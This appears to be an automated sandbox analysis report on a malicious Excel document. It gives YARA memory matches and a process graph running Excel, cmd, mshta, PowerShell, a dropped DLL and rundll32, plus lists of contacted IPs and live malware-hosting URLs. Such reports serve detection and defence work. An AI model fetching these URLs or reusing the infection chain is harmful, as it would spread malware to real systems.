Source: Yara match File source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Milossd.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562416 Sample: DOCUMENT_2801.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 52 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->52 54 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->54 56 29 other IPs or domains 2->56 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 17 other signatures 2->70 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 50 C:\Users\user\Desktop\DOCUMENT_2801.xls, Composite 15->50 dropped 62 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 15->62 19 cmd.exe 15->19         started        signatures6 process7 process8 21 cmd.exe 19->21         started        23 cmd.exe 19->23         started        process9 25 mshta.exe 11 21->25         started        dnsIp10 58 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 25->58 28 powershell.exe 12 7 25->28         started        process11 dnsIp12 60 tamiladsense.com 136.0.111.15, 49167, 80 AS40676US United States 28->60 48 C:\ProgramData\Milossd.dll, PE32 28->48 dropped 76 Powershell drops PE file 28->76 33 cmd.exe 28->33         started        file13 signatures14 process15 process16 35 rundll32.exe 33->35         started        process17 37 rundll32.exe 1 35->37         started        file18 46 C:\Windows\...\kisyfwhhvxv.tpx (copy), PE32 37->46 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->72 41 rundll32.exe 37->41         started        signatures19 process20 process21 43 rundll32.exe 1 41->43         started        signatures22 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->74
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
207.148.81.119
 unknown United States
20473 AS-CHOOPAUS true
104.131.62.48
 unknown United States
14061 DIGITALOCEAN-ASNUS true
198.199.98.78
 unknown United States
14061 DIGITALOCEAN-ASNUS true
194.9.172.107
 unknown unknown
207992 FEELBFR true
59.148.253.194
 unknown Hong Kong
9269 HKBN-AS-APHongKongBroadbandNetworkLtdHK true
74.207.230.120
 unknown United States
63949 LINODE-APLinodeLLCUS true
103.41.204.169
 unknown Indonesia
58397 INFINYS-AS-IDPTInfinysSystemIndonesiaID true
85.214.67.203
 unknown Germany
6724 STRATOSTRATOAGDE true
191.252.103.16
 unknown Brazil
27715 LocawebServicosdeInternetSABR true
168.197.250.14
 unknown Argentina
264776 OmarAnselmoRipollTDCNETAR true
185.148.168.15
 unknown Germany
44780 EVERSCALE-ASDE true
66.42.57.149
 unknown United States
20473 AS-CHOOPAUS true
139.196.72.155
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
217.182.143.207
 unknown France
16276 OVHFR true
136.0.111.15
 tamiladsense.com United States
40676 AS40676US true
203.153.216.46
 unknown Indonesia
45291 SURF-IDPTSurfindoNetworkID true
159.69.237.188
 unknown Germany
24940 HETZNER-ASDE true
116.124.128.206
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
37.59.209.141
 unknown France
16276 OVHFR true
78.46.73.125
 unknown Germany
24940 HETZNER-ASDE true
210.57.209.142
 unknown Indonesia
38142 UNAIR-AS-IDUniversitasAirlanggaID true
185.148.168.220
 unknown Germany
44780 EVERSCALE-ASDE true
54.37.228.122
 unknown France
16276 OVHFR true
185.168.130.138
 unknown Ukraine
49720 GIGACLOUD-ASUA true
190.90.233.66
 unknown Colombia
18678 INTERNEXASAESPCO true
142.4.219.173
 unknown Canada
16276 OVHFR true
54.38.242.185
 unknown France
16276 OVHFR true
195.154.146.35
 unknown France
12876 OnlineSASFR true
195.77.239.39
 unknown Spain
60493 FICOSA-ASES true
78.47.204.80
 unknown Germany
24940 HETZNER-ASDE true
118.98.72.86
 unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
37.44.244.177
 unknown Germany
47583 AS-HOSTINGERLT true
91.240.118.172
 unknown unknown
49453 GLOBALLAYERNL true
62.171.178.147
 unknown United Kingdom
51167 CONTABODE true
128.199.192.135
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
tamiladsense.com 136.0.111.15 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.240.118.172/ee/ss/se.html true
  • Avira URL Cloud: malware
 unknown
http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/ee/ss/se.png true
  • Avira URL Cloud: malware
 unknown